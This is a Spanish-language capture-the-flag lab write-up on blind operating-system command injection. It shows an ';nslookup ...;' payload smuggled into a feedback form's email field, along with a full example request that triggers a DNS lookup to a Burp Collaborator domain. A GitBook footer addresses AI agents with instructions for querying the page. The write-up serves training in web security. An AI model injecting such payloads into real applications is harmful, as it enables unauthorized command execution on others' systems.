> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/command-injection/blind-command-injection-with-oob-interaction.md).

# Inyección de comandos ciega con interacción OOB

### Inyección ciega de comandos del sistema operativo con interacción fuera de banda

Este laboratorio presenta una vulnerabilidad de inyección de comandos del sistema ciega en la funcionalidad de comentarios. / La aplicación ejecuta un comando de shell construido a partir de datos proporcionados por el usuario. Esta ejecución es **asíncrona** y no influye en la respuesta devuelta por la aplicación. No es posible redirigir la salida del comando a una ubicación accesible. Por otro lado, es posible provocar **interacciones fuera de banda (OOB)** con un dominio externo.

El objetivo del laboratorio es usar esta inyección para forzar a la aplicación a realizar una solicitud \*\* DNS\*\* a un dominio de Burp Collaborator.

#### **Enfoque**

`nslookup` se utiliza para generar una consulta saliente. / La inyección se realiza en uno de los campos del formulario, rodeando el comando con `;` para romper la sintaxis original.

Ejemplo de comando probado:

```
nslookup
```

Carga útil inyectada:

<pre><code><strong>;nslookup IP;
</strong></code></pre>

Si la inyección funciona, recibimos la solicitud en Burp Collaborator.

#### **Ejemplo de solicitud completa**

{% code overflow="wrap" %}

```bash
csrf=2GdzmbhNzU7HHOj8pOZUwUfJ1s0EIbjP&name=test&email=test%40test.com.com;nslookup v51x9gtodb5n35252oddaichm8szgq4f.oastify.com;&subject=test&message=test.com
```

{% endcode %}

Esta carga útil desencadena una solicitud DNS al dominio controlado, confirmando la inyección ciega OOB.

<figure><img src="/files/884a97444dddb4f1135a330a5eeefa7c9025b573" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/command-injection/blind-command-injection-with-oob-interaction.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
